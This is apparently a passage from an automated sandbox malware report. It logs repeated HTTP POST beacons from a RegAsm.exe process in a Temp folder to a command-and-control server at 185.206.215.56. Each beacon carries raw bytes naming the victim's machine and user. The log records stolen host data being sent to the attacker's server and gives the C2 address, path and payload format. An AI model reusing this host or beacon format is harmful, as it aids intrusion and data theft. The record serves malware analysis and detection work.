                                                                                        Jan 5, 2021 19:06:34.636512041 CET1231OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:34.721364021 CET1232INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:33 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        69192.168.2.2249236185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:34.935154915 CET1232OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:35.011723995 CET1233OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:35.122327089 CET1233INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:34 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        7192.168.2.2249174185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:10.067265987 CET1151OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:10.136713982 CET1151OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:10.236854076 CET1151INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:09 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        70192.168.2.2249237185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:35.342015982 CET1234OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:35.417776108 CET1234OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:35.512182951 CET1234INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:34 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        71192.168.2.2249238185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:35.726449013 CET1235OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:35.793070078 CET1235OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:35.894052029 CET1236INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:34 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        72192.168.2.2249239185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:36.098104954 CET1236OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:36.168203115 CET1237OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:36.277201891 CET1237INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:35 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        73192.168.2.2249240185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:36.491085052 CET1238OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:36.558549881 CET1238OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:36.657366991 CET1238INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:35 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        74192.168.2.2249241185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:36.879807949 CET1239OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:36.949330091 CET1239OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:37.043514013 CET1240INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:36 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        75192.168.2.2249242185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:37.256016970 CET1240OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:37.324479103 CET1241OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:37.425204039 CET1241INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:36 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        76192.168.2.2249243185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:37.635343075 CET1242OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:37.714823008 CET1242OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:37.804227114 CET1242INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:36 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        77192.168.2.2249244185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:38.018240929 CET1243OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:38.089756966 CET1243OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:38.186780930 CET1244INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:37 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        78192.168.2.2249245185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:38.389239073 CET1244OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:38.464616060 CET1245OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:38.563167095 CET1245INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:37 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        79192.168.2.2249246185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:38.784643888 CET1246OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:38.870753050 CET1246OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:38.965107918 CET1246INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:38 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        8192.168.2.2249175185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:10.499610901 CET1152OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:10.574229002 CET1152OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:10.673142910 CET1153INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:09 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        80192.168.2.2249247185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:39.177875996 CET1247OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:39.246382952 CET1247OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:39.331864119 CET1248INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:38 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        81192.168.2.2249248185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:39.554968119 CET1248OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:39.636351109 CET1249OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:39.738313913 CET1249INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:38 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        82192.168.2.2249249185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:39.944185019 CET1250OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:40.027277946 CET1250OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:40.121556044 CET1250INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:39 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        83192.168.2.2249250185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:40.335809946 CET1251OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
